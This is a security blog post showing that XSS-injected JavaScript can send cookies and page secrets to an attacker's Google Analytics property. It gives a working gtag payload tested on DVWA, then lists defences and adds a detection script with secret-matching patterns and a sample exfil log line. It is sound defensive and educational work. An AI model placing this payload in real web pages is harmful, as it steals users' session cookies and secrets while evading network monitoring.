kyhwana ([personal profile] kyhwana) wrote2017-11-22 11:15 am

Using Google Analytics to exfil JavaScript secrets/cookies.

So I was inspired after reading https://www.reddit.com/r/btc/comments/7dsmvd/my_analysis_of_the_1_million_usd_mybtgwalletcom/, where someone modified the JavaScript source of a Bitcoin Gold (BTG) wallet to send user secrets to the attacker's Google Analytics account, and I figured I should see if this was actually possible. It turns out that yes, yes you can.

The only requirement for this attack is that you can get the client's browser to execute some JavaScript of your choosing. In most cases that means XSS (reflected or stored), modifying the site's own JavaScript in transit or at rest, or uploading a JavaScript file that you can then get included and executed. If you can't get the server or client to fetch your JavaScript for you, XSS is usually the way in.

Given that we already need XSS or some kind of MITM/modification of source files, you might ask "Why would we use Google Analytics for exfil?"
Well, if the client or server isn't blocking Google Analytics, anyone looking at IDS or DNS logs will see a normal-looking GA connection to a Google host (protected by HTTPS, so the payload itself isn't visible to a passive observer) and think nothing of it. No attacker-controlled domain or IP address ever shows up in the logs. It's a sneaky way of exfilling data that, before the BTG wallet hack, I had not seen before.

Let's get started!

First of all you need a GA account. This is easy; Google will give you one for free.
Create a Custom Dimension as described here: https://developers.google.com/analytics/devguides/collection/gtagjs/custom-dims-mets
This lets us set a dimension to anything we want (such as cookies that JavaScript can access, or any other JavaScript variable) and have it sent to GA as part of an ordinary hit, where it shows up in our reports. Note the index GA assigns to the dimension; the code below assumes it is dimension2.

[Screenshot: Setup custom dimensions]

Create a custom report:
[Screenshot: Create custom report]

We host or upload our GA JavaScript somewhere (or inline it in the XSS payload):

// Load gtag.js for the attacker-controlled property; this is the standard
// gtag loader tag, using the same placeholder tracking ID as below.
document.write('<script async src="https://www.googletagmanager.com/gtag/js?id=UA-ID-2"><\/script>');
var secrets='totes javascripts secrets PoC here'; // stand-in for whatever the page keeps in JS
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
// Map the event parameter 'pass' onto custom dimension index 2 of our property.
gtag('config', 'UA-ID-2',{'custom_map': {'dimension2': 'pass'}});
// Fire an event; 'pass' (and so dimension2) carries the cookies plus the secret.
gtag('event', 'pass_dimension' , {'pass': document.cookie+' '+secrets});


Insert it via XSS (reflected or stored both work), and here you can see our GA cookie and some JavaScript variables being sent to GA. (I used DVWA locally for the XSS.)
[Screenshot: Away we go]

And here is the GA dashboard showing our secrets, including the DVWA PHP session ID:
[Screenshot: Secrets]


So how do you protect against this?
Find and fix all the XSS and remote/local file inclusion vulnerabilities. Without code execution in the victim's browser there is nothing to exfil.
Ad/tracking blockers on the client side that block Google Analytics will stop this from working for that user. On a corporate network, block the GA hosts at the network or endpoint level. Note that a CSP which allows GA for your own property does not help here: the attacker's hits go to the same Google hosts, and CSP can't tell your tracking ID from theirs.
Set your cookies HttpOnly so that JavaScript can't read them. That only protects the cookies, though; anything else the page keeps in JavaScript-reachable state (variables, localStorage, the DOM) can still be read and sent, so the real fix is the first one.
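If you can't block GA outright, the other angle is to look for it in your own logs. Since the exfil rides on a normal GA hit, the two things that give it away are a tracking ID you don't own (in the gtag.js loader's ?id= and in the hit's tid=) and cookie- or key-looking data in the custom dimension fields (cd1, cd2, ...). Below is an added example, not code from this post, showing that check as a small Node.js script run over a constructed proxy log. It assumes the log records full request URLs (query string included) as the last field of each line, and the allow-list of "our" tracking IDs is made up for the example.

```javascript
// Added example for this post (not kyhwana's code): flag Google Analytics
// traffic that carries a tracking ID we don't own, or cookie/session-looking
// data in a custom dimension. Assumes a proxy log that records full request
// URLs (including query strings) as the last field of each line; the
// allow-list and the log lines below are constructed for the example.

// Tracking IDs of our own GA properties (assumed allow-list).
const KNOWN_TIDS = new Set(['UA-12345-1']);

// Things that should never appear in a hit: cookie assignments, long hex
// blobs (session IDs, keys, hashes) or wallet/password-ish words.
const SECRET_PATTERNS = [
  /(?:^|[;\s])(?:PHPSESSID|JSESSIONID|ASP\.NET_SessionId|session|token|auth)[^=]*=/i,
  /\b[0-9a-f]{26,}\b/i,
  /\b(?:password|secret|seed|mnemonic|privkey)\b/i,
];

// Measurement Protocol fields that carry free text: custom dimensions
// (cd1..cd200), event category/action/label and document title.
const TEXT_FIELDS = /^(cd\d+|ec|ea|el|dt)$/;

// Inspect one URL. Returns null for non-GA traffic, otherwise
// { tid, findings } where findings is a list of human-readable reasons.
function analyzeHit(urlString) {
  let url;
  try { url = new URL(urlString); } catch (e) { return null; }
  const p = url.searchParams;
  // gtag.js loader: the property ID is the ?id= parameter.
  const isLoader = /(^|\.)googletagmanager\.com$/.test(url.hostname) && url.pathname === '/gtag/js';
  // Measurement Protocol hit (/collect, /r/collect, ...): the ID is tid=.
  const isHit = /(^|\.)google-analytics\.com$/.test(url.hostname) && /\/collect$/.test(url.pathname);
  if (!isLoader && !isHit) return null;

  const tid = isLoader ? p.get('id') : p.get('tid');
  const findings = [];
  if (tid && !KNOWN_TIDS.has(tid)) {
    findings.push(`unknown tracking id ${tid}`);
  }
  if (isHit) {
    for (const [key, value] of p.entries()) {
      if (!TEXT_FIELDS.test(key)) continue;
      if (SECRET_PATTERNS.some((re) => re.test(value))) {
        findings.push(`${key} looks like secret data: ${value.slice(0, 40)}`);
      }
    }
  }
  return { tid, findings };
}

// Run over log lines; return only the lines worth an alert.
function scanLog(lines) {
  const alerts = [];
  for (const line of lines) {
    const fields = line.trim().split(/\s+/);
    const result = analyzeHit(fields[fields.length - 1]);
    if (result && result.findings.length > 0) {
      alerts.push({ line, tid: result.tid, findings: result.findings });
    }
  }
  return alerts;
}

// Constructed log: a normal pageview from our own property, then the
// loader and the event hit a payload like the one above would produce
// (simplified; real gtag hits carry many more parameters and may be sent
// as POST bodies rather than query strings, which the log must capture).
const SAMPLE_LOG = [
  '2017-11-22T11:15:01Z 10.0.0.5 https://www.google-analytics.com/collect?v=1&t=pageview&tid=UA-12345-1&cid=555&dp=%2Fhome',
  '2017-11-22T11:15:02Z 10.0.0.5 https://www.googletagmanager.com/gtag/js?id=UA-99999-2',
  '2017-11-22T11:15:03Z 10.0.0.5 https://www.google-analytics.com/r/collect?v=1&t=event&tid=UA-99999-2&cid=555&ec=general&ea=pass_dimension&cd2=PHPSESSID%3D5f2a3c9e7b1d4a6f8c0e2b4d6f8a1c3e%3B%20security%3Dlow%20totes%20secrets',
];

for (const a of scanLog(SAMPLE_LOG)) {
  console.log(a.line.split(/\s+/)[0], a.tid, a.findings.join(' | '));
}
```

The pageview from our own property passes, the loader for the unknown property is flagged on its ID alone, and the event hit is flagged twice: unknown tid, and a cd2 value that starts with a PHPSESSID cookie. The tracking-ID check is the cheap, reliable one; the pattern list is a starting point and will need tuning to whatever your own pages legitimately put in event labels and titles.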